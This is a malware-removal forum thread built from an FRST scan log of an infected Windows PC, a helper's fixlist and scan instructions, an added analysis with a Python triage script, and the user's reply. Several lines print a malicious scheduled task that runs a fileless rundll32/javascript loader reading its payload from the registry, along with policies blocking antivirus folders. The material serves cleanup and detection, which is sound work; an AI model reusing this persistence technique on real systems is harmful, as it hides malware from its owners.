2006-11-02 11:23 - 2014-12-06 09:03 - 00000732 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {0BFFF69F-8A2D-4D08-9001-59641D3A012D} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - finja => C:\Program Files\Windows Calendar\WinCal.exe [2009-04-11] (Microsoft Corporation)
Task: {1045E6B6-E707-475F-97CD-571E06C36511} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-4 No Task File <==== ATTENTION
Task: {1245B223-395D-46A5-93D1-C9AE1D55861B} - System32\Tasks\Registration 1und1 Task => C:\Program Files\1und1Softwareaktualisierung\cdsupdclient.exe [2014-03-31] (1&1 Mail & Media GmbH)
Task: {12725841-0DB7-461B-94D5-8A90F6589009} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
Task: {1EB9CADD-2506-46E7-96AD-5CBB99CAD30C} - \9038396b-6856-4ead-9ee7-1215f651f0aa No Task File <==== ATTENTION
Task: {26928486-85D4-43D1-846F-D5189AE90D56} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-1 No Task File <==== ATTENTION
Task: {33B6F316-29F5-4DEA-A8CC-B9249563A4AB} - \04b071f9-0b45-4ff0-af73-073c440df543-11 No Task File <==== ATTENTION
Task: {3738576E-1797-480B-AB26-9BECD9BC9AB1} - \04b071f9-0b45-4ff0-af73-073c440df543-4 No Task File <==== ATTENTION
Task: {4BF96ACD-C54D-472D-BD3D-8C4495786051} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5_user No Task File <==== ATTENTION
Task: {50B6DF40-8A74-4768-B9E7-44B068036A93} - \04b071f9-0b45-4ff0-af73-073c440df543-3 No Task File <==== ATTENTION
Task: {521C87B6-4ECD-45FA-A21F-0987123DD4C6} - \afbfdcf4-7553-4735-ab81-4373cca9a051-6 No Task File <==== ATTENTION
Task: {547E6824-355F-4AC3-8FBC-7E4FBF25D3EF} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5 No Task File <==== ATTENTION
Task: {5E8F5D12-D836-4FA2-A55F-60B345663AEB} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Signature Update => c:\program files\windows defender\MpCmdRun.exe [2008-01-21] (Microsoft Corporation)
Task: {665589FE-FED9-450D-8CAC-BCD6A34E666E} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-2 No Task File <==== ATTENTION
Task: {6ED78F91-0AE2-43BA-8C76-47269CF7A210} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-2 No Task File <==== ATTENTION
Task: {793BBF80-2488-4871-8D11-6A461B28C8DE} - System32\Tasks\MQZDOUD => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: {7BC36AEC-816F-4BC2-93E6-9836D38AAD73} - \04b071f9-0b45-4ff0-af73-073c440df543-1 No Task File <==== ATTENTION
Task: {88A4BAC1-045F-4DEC-B932-AEFCD853FCBB} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-11 No Task File <==== ATTENTION
Task: {8C6325F8-822B-4446-8F5E-79B27AA3A5D0} - \04b071f9-0b45-4ff0-af73-073c440df543-5_user No Task File <==== ATTENTION
Task: {928B2F3B-2C64-4AED-9F1B-93315F01FBDC} - \afbfdcf4-7553-4735-ab81-4373cca9a051-7 No Task File <==== ATTENTION
Task: {99F31AC3-75A5-427A-A9A1-F7B67F954F82} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-1 No Task File <==== ATTENTION
Task: {A983A371-8E43-4C81-AB3D-1793E6C729DD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5_user No Task File <==== ATTENTION
Task: {ADB99999-9CE5-4C49-8F93-40086B7A25B0} - \afbfdcf4-7553-4735-ab81-4373cca9a051-11 No Task File <==== ATTENTION
Task: {B07D5064-3E65-4825-82D2-D8ABAFA800DB} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-4 No Task File <==== ATTENTION
Task: {B2DE553E-4F93-444A-B89F-264EA7144119} - System32\Tasks\1und1 Konfiguration => C:\ProgramData\1und1InternetExplorerAddon\ConfigTask.exe [2011-03-16] (1und1 Mail und Media GmbH)
Task: {B31760E5-4C25-4B17-AA41-19EBAB4B5530} - System32\Tasks\XPGILDE => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION
Task: {CD87FD16-CBAA-439E-97ED-F35F08A43569} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5 No Task File <==== ATTENTION
Task: {D577D774-768A-41F6-807D-4B88E2B8F71A} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-3 No Task File <==== ATTENTION
Task: {E911148E-9670-41D8-BAE6-AB49D00F4C5E} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-11 No Task File <==== ATTENTION
Task: {EAA78C2F-DE4A-448D-B187-69456B16B48A} - \04b071f9-0b45-4ff0-af73-073c440df543-5 No Task File <==== ATTENTION
Task: {F5A45096-AF42-4D57-AAD9-D9BDE4DCFFCD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-7 No Task File <==== ATTENTION
Task: {F6739869-2927-42C5-B8E3-6A24E4A7A5A4} - \04b071f9-0b45-4ff0-af73-073c440df543-2 No Task File <==== ATTENTION
Task: {FB314ECF-96F0-41DC-8CC2-C2561140CB57} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-6 No Task File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\MQZDOUD.job => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: C:\Windows\Tasks\XPGILDE.job => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION

==================== Loaded Modules (whitelisted) =============

2009-02-27 10:19 - 2008-06-11 11:18 - 00024576 _____ () C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe
2009-02-27 10:19 - 2009-02-27 10:19 - 00032768 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.Controller\3.0.3009.0__14bcaafdb44b5951\Framework.Model.Controller.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00009216 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.ControllerInterface\3.0.3009.0__d842b71b4d6ed079\Framework.Model.ControllerInterface.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00061440 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Library\3.0.3009.0__3036420f80dd6947\Framework.Library.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00015360 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Host\3.0.3009.0__672b450de5a7e94a\Framework.Host.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00006144 _____ () C:\Windows\assembly\GAC_MSIL\Framework.PluginInterface\3.0.3009.0__9ecdf03bb2054f94\Framework.PluginInterface.dll
2009-02-27 10:20 - 2009-02-27 10:20 - 00036864 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Utility\3.0.3009.0__4df5dcab8860d239\Framework.Utility.dll
2008-07-30 05:01 - 2003-06-07 06:30 - 00057344 _____ () C:\Program Files\Launch Manager\PowerUtl.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\ProgramData\TEMP:9E22BBE8

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Administrator (S-1-5-21-717213786-2690546565-922636609-500 - Administrator - Disabled)
finja (S-1-5-21-717213786-2690546565-922636609-1000 - Administrator - Enabled) => C:\Users\finja
Gast (S-1-5-21-717213786-2690546565-922636609-501 - Limited - Disabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================

System errors:
=============

Microsoft Office Sessions:
=========================

CodeIntegrity Errors:
===================================
  Date: 2014-12-06 16:31:55.653
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 16:31:55.029
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 16:31:54.405
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 16:31:53.812
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 16:11:32.432
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 15:51:10.190
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 15:51:09.521
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 15:51:08.787
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 15:51:08.085
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 15:40:48.924
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Memory info =========================== 

Processor: Pentium(R) Dual-Core CPU T4200 @ 2.00GHz
Percentage of memory in use: 38%
Total physical RAM: 3001.08 MB
Available physical RAM: 1840.15 MB
Total Pagefile: 6230.44 MB
Available Pagefile: 4947.89 MB
Total Virtual: 2047.88 MB
Available Virtual: 1887.38 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:288.08 GB) (Free:237.85 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 93D3AC9B)
Partition 1: (Not Active) - (Size=10 GB) - (Type=27)
Partition 2: (Active) - (Size=288.1 GB) - (Type=07 NTFS)

==================== End Of Log ============================
         
__________________

06.12.2014, 17:27   #4
Machiavelli

Step 1: FRST Fix

Please press the Windows key + R and type notepad into the Run window.

Now copy the following text from the code box into the empty text document

Code:
HKLM\...\Run: [eRecoveryService] => [X]
HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Symantec <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [TaskbarNoNotification] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [.DEFAULT] => http=127.0.0.1:53278;https=127.0.0.1:53278
SearchScopes: HKLM -> DefaultScope {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL =
Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {FA23121F-EE7C-4BD8-8C06-123D087282C5} -  No File
Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {F2413FFA-9DCC-48B3-A09A-625F44D7FA96} -  No File
FF NetworkProxy: "http", "127.0.0.1"
FF NetworkProxy: "http_port", 38159
FF NetworkProxy: "no_proxies_on", "localho,t,127.0.0.1,*origin.com,*ea.com,*akamaihd.net"
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found]
FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - tylerkeith11@aol.com [Not Found]
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
S2 compilerehtraceProt.exe; C:\Users\finja\AppData\Local\compilerehtraceProt\compilerehtraceProt.exe [X]
S2 evrtspkgBckp.exe; C:\Users\finja\AppData\Local\evrtspkgBckp\evrtspkgBckp.exe [X]
S2 FrozenGNUThumbnail.exe; C:\Users\finja\AppData\Local\FrozenGNUThumbnail\FrozenGNUThumbnail.exe [X]
S2 FrozenSambaWindows.exe; C:\Users\finja\AppData\Local\FrozenSambaWindows\FrozenSambaWindows.exe [X]
2014-12-03 19:45 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\ZorkoKcesd
2014-12-02 19:37 - 2014-12-02 19:37 - 00000000 ____D () C:\Windows\system32\utilitylocalspl_86
2014-12-02 19:34 - 2014-12-02 19:34 - 00000000 ____D () C:\Windows\system32\scrollingwin32Prot
2014-12-01 11:06 - 2014-12-06 15:37 - 00000000 ___HD () C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}
2014-12-01 11:06 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\EedtaWbezm
2014-11-28 20:51 - 2014-11-28 20:51 - 00000000 ____D () C:\ProgramData\UUdb
2014-11-11 08:40 - 2014-12-06 16:09 - 00001340 _____ () C:\Windows\Tasks\XPGILDE.job
2014-11-11 08:39 - 2014-12-06 16:09 - 00001684 _____ () C:\Windows\Tasks\MQZDOUD.job
C:\Users\finja\remove.exe
C:\Users\finja\AppData\Local\Temp\Quarantine.exe
C:\Users\finja\AppData\Local\Temp\sqlite3.dll
Task: {0BFFF69F-8A2D-4D08-9001-59641D3A012D} - 
Task: {1045E6B6-E707-475F-97CD-571E06C36511} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-4 No Task File <==== ATTENTION
Task: {12725841-0DB7-461B-94D5-8A90F6589009} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
Task: {1EB9CADD-2506-46E7-96AD-5CBB99CAD30C} - \9038396b-6856-4ead-9ee7-1215f651f0aa No Task File <==== ATTENTION
Task: {26928486-85D4-43D1-846F-D5189AE90D56} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-1 No Task File <==== ATTENTION
Task: {33B6F316-29F5-4DEA-A8CC-B9249563A4AB} - \04b071f9-0b45-4ff0-af73-073c440df543-11 No Task File <==== ATTENTION
Task: {3738576E-1797-480B-AB26-9BECD9BC9AB1} - \04b071f9-0b45-4ff0-af73-073c440df543-4 No Task File <==== ATTENTION
Task: {4BF96ACD-C54D-472D-BD3D-8C4495786051} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5_user No Task File <==== ATTENTION
Task: {50B6DF40-8A74-4768-B9E7-44B068036A93} - \04b071f9-0b45-4ff0-af73-073c440df543-3 No Task File <==== ATTENTION
Task: {521C87B6-4ECD-45FA-A21F-0987123DD4C6} - \afbfdcf4-7553-4735-ab81-4373cca9a051-6 No Task File <==== ATTENTION
Task: {547E6824-355F-4AC3-8FBC-7E4FBF25D3EF} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5 No Task File <==== ATTENTION
Task: {665589FE-FED9-450D-8CAC-BCD6A34E666E} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-2 No Task File <==== ATTENTION
Task: {6ED78F91-0AE2-43BA-8C76-47269CF7A210} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-2 No Task File <==== ATTENTION
Task: {793BBF80-2488-4871-8D11-6A461B28C8DE} - System32\Tasks\MQZDOUD => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: {7BC36AEC-816F-4BC2-93E6-9836D38AAD73} - \04b071f9-0b45-4ff0-af73-073c440df543-1 No Task File <==== ATTENTION
Task: {88A4BAC1-045F-4DEC-B932-AEFCD853FCBB} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-11 No Task File <==== ATTENTION
Task: {8C6325F8-822B-4446-8F5E-79B27AA3A5D0} - \04b071f9-0b45-4ff0-af73-073c440df543-5_user No Task File <==== ATTENTION
Task: {928B2F3B-2C64-4AED-9F1B-93315F01FBDC} - \afbfdcf4-7553-4735-ab81-4373cca9a051-7 No Task File <==== ATTENTION
Task: {99F31AC3-75A5-427A-A9A1-F7B67F954F82} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-1 No Task File <==== ATTENTION
Task: {A983A371-8E43-4C81-AB3D-1793E6C729DD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5_user No Task File <==== ATTENTION
Task: {ADB99999-9CE5-4C49-8F93-40086B7A25B0} - \afbfdcf4-7553-4735-ab81-4373cca9a051-11 No Task File <==== ATTENTION
Task: {B07D5064-3E65-4825-82D2-D8ABAFA800DB} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-4 No Task File <==== ATTENTION
Task: {B31760E5-4C25-4B17-AA41-19EBAB4B5530} - System32\Tasks\XPGILDE => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION
Task: {CD87FD16-CBAA-439E-97ED-F35F08A43569} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5 No Task File <==== ATTENTION
Task: {D577D774-768A-41F6-807D-4B88E2B8F71A} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-3 No Task File <==== ATTENTION
Task: {E911148E-9670-41D8-BAE6-AB49D00F4C5E} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-11 No Task File <==== ATTENTION
Task: {EAA78C2F-DE4A-448D-B187-69456B16B48A} - \04b071f9-0b45-4ff0-af73-073c440df543-5 No Task File <==== ATTENTION
Task: {F5A45096-AF42-4D57-AAD9-D9BDE4DCFFCD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-7 No Task File <==== ATTENTION
Task: {F6739869-2927-42C5-B8E3-6A24E4A7A5A4} - \04b071f9-0b45-4ff0-af73-073c440df543-2 No Task File <==== ATTENTION
Task: {FB314ECF-96F0-41DC-8CC2-C2561140CB57} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-6 No Task File <==== ATTENTION
Task: C:\Windows\Tasks\MQZDOUD.job => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: C:\Windows\Tasks\XPGILDE.job => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\ProgramData\TEMP:9E22BBE8
EmptyTemp:
         

Please save this as Fixlist.txt on your Desktop (or in the directory where FRST is located).
  • Now start FRST again and click the Fix (Entfernen) button.
  • The tool creates a Fixlog.txt.
  • Post its contents for me.



Step 2: FRST Scan

Please start FRST again, also tick the box for Addition.txt and click Scan.

Step 3: ESET


ESET Online Scanner

  • Here you will find an illustrated guide to ESET Online Scanner
  • Download and start Eset Online Scanner
  • Tick the box for Yes, I accept the Terms of Use and click Start.
  • Enable "Detection of potentially unwanted applications" and choose the following settings.
  • Click Start.
  • The signatures are downloaded and the scan starts automatically.
  • At the end of the scan, click Finish.
  • Close the ESET window.
  • Open Explorer.
  • Locate C:\Programme\Eset\EsetOnlineScanner\log.txt (on 64-bit also C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) and open it with your editor (illustrated).
  • Post the logfile here.
  • Uninstall: Control Panel => Software / Uninstall programs => remove Eset Online Scanner V3.
  • Manually delete the following folder and empty the Recycle Bin => C:\Programme\Eset



Step 4: Question

How is your PC running?
__________________
Proud member of Unite
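
Read together, the scan posted above and the fix just prescribed document four mechanisms that are worth recognising in any FRST log. First, a scheduled task named GoogleUpdater whose action is Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";...: rundll32 resolves that argument as a path to mshtml.dll and calls its RunHTMLApplication export, which treats the javascript: part of the command line as a URL to execute, and the script reads its real payload from the registry value HKCU\software\microsoft\internet explorer\zergling_rush. No script file exists on disk, which is why a file-based scan finds nothing and the tasks keep coming back. Second, tasks and .job files that launch randomly named executables (MQZDOUD.exe, XPGILDE.exe) from C:\Users\finja\AppData\Roaming, alongside GUID-named task registrations whose task files are already gone. Third, Group Policy software restriction entries covering the Symantec, Malwarebytes, McAfee and Microsoft Antimalware directories, i.e. a path policy that blocks security tools from starting. Fourth, the system proxy and the Firefox proxy both pointed at 127.0.0.1 on a high port, so a local process was sitting in front of all web traffic, and S2 services whose binaries no longer exist.

The Python below is an added triage example, not code from this thread or from FRST: it runs a handful of rules over FRST-style lines and, for the rundll32 task, extracts the registry value the script reads. The sample lines are copied from the scan and fix above; the rule names and severities are my own choice.

```python
"""Rule-based triage of FRST scan lines (added example; not FRST's own code)."""
import re

# Sample input: lines taken from the FRST scan and fix posted in this thread.
SAMPLE_LINES = [
    r"Task: {1045E6B6-E707-475F-97CD-571E06C36511} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-4 No Task File <==== ATTENTION",
    r'Task: {12725841-0DB7-461B-94D5-8A90F6589009} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))',
    r"Task: {793BBF80-2488-4871-8D11-6A461B28C8DE} - System32\Tasks\MQZDOUD => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION",
    r"Task: C:\Windows\Tasks\XPGILDE.job => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION",
    r"Task: {0BFFF69F-8A2D-4D08-9001-59641D3A012D} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - finja => C:\Program Files\Windows Calendar\WinCal.exe [2009-04-11] (Microsoft Corporation)",
    r"ProxyServer: [.DEFAULT] => http=127.0.0.1:53278;https=127.0.0.1:53278",
    r'FF NetworkProxy: "http", "127.0.0.1"',
    r"HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION",
    r"S2 evrtspkgBckp.exe; C:\Users\finja\AppData\Local\evrtspkgBckp\evrtspkgBckp.exe [X]",
    r"127.0.0.1       localhost",
]

# Rules are checked in order; the first match wins. Names/severities are this example's own.
RULES = [
    # rundll32 + a javascript: URL + mshtml,RunHTMLApplication: script runs with no
    # file on disk; the payload is usually fetched from the registry (see below).
    ("fileless_rundll32_script", "high",
     re.compile(r"rundll32(?:\.exe)?\s+javascript:", re.I)),
    # Task registration still in the registry although its task file is gone.
    ("orphan_task_registration", "medium",
     re.compile(r"^Task: \{[0-9A-F-]{36}\} - .* No Task File", re.I)),
    # Task or .job file launching an .exe from a user-writable profile directory.
    ("task_runs_user_profile_exe", "high",
     re.compile(r"^Task: .*=> [A-Z]:\\Users\\[^\\]+\\AppData\\(?:Roaming|Local)\\.*\.exe", re.I)),
    # System or Firefox proxy pointed at loopback: a local process intercepts web traffic.
    ("loopback_proxy", "high",
     re.compile(r'^(?:ProxyServer:|FF NetworkProxy: "http",).*127\.0\.0\.1')),
    # Software Restriction Policy path rules; malware uses them to block AV directories.
    ("srp_path_restriction", "high",
     re.compile(r"^HK\w+ Group Policy restriction on software: ")),
    # Auto-start service (S2) whose binary is missing, marked [X] by FRST.
    ("service_missing_binary", "medium",
     re.compile(r"^S[0-4] .*\[X\]$")),
]

_REGREAD = re.compile(r'RegRead\("([^"]+)"\)')


def triage(lines):
    """Return (rule, severity, line) for every line that matches a rule."""
    findings = []
    for raw in lines:
        line = raw.rstrip()
        for name, severity, rx in RULES:
            if rx.search(line):
                findings.append((name, severity, line))
                break
    return findings


def summarize(lines):
    """Count findings per rule name."""
    counts = {}
    for name, _, _ in triage(lines):
        counts[name] = counts.get(name, 0) + 1
    return counts


def registry_payload_location(line):
    """For a rundll32/javascript task line, return the registry value the script
    reads via WScript.Shell.RegRead, with JScript's doubled backslashes undone.
    Returns None when the line contains no RegRead call."""
    m = _REGREAD.search(line)
    if not m:
        return None
    return m.group(1).replace("\\\\", "\\")


if __name__ == "__main__":
    for name, severity, line in triage(SAMPLE_LINES):
        print(f"[{severity:6}] {name:28} {line[:90]}")
        if name == "fileless_rundll32_script":
            print(f"         payload read from: {registry_payload_location(line)}")
```

Run as a script it prints eight findings for the ten sample lines; the legitimate WinCal.exe task and the hosts entry pass through. In a real triage you would feed it the whole FRST.txt and Addition.txt, then confirm each hit on the host: the task registrations with schtasks /query /v, the path rules under HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers, and the content of the registry value the rundll32 task reads, which is the part of this infection that no file listing shows.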

06.12.2014, 21:03   #5
sbr_vfb

Start-up is definitely faster, and the system itself also runs more stably and feels faster, so thanks already for that.

Here are the requested logs:

Fixlog:
Code:
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 06-12-2014 02
Ran by finja at 2014-12-06 17:35:25 Run:1
Running from C:\Users\finja\Desktop
Loaded Profile: finja (Available profiles: finja)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
HKLM\...\Run: [eRecoveryService] => [X]
HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Symantec <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [TaskbarNoNotification] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [.DEFAULT] => http=127.0.0.1:53278;https=127.0.0.1:53278
SearchScopes: HKLM -> DefaultScope {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL =
Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {FA23121F-EE7C-4BD8-8C06-123D087282C5} -  No File
Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {F2413FFA-9DCC-48B3-A09A-625F44D7FA96} -  No File
FF NetworkProxy: "http", "127.0.0.1"
FF NetworkProxy: "http_port", 38159
FF NetworkProxy: "no_proxies_on", "localho,t,127.0.0.1,*origin.com,*ea.com,*akamaihd.net"
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found]
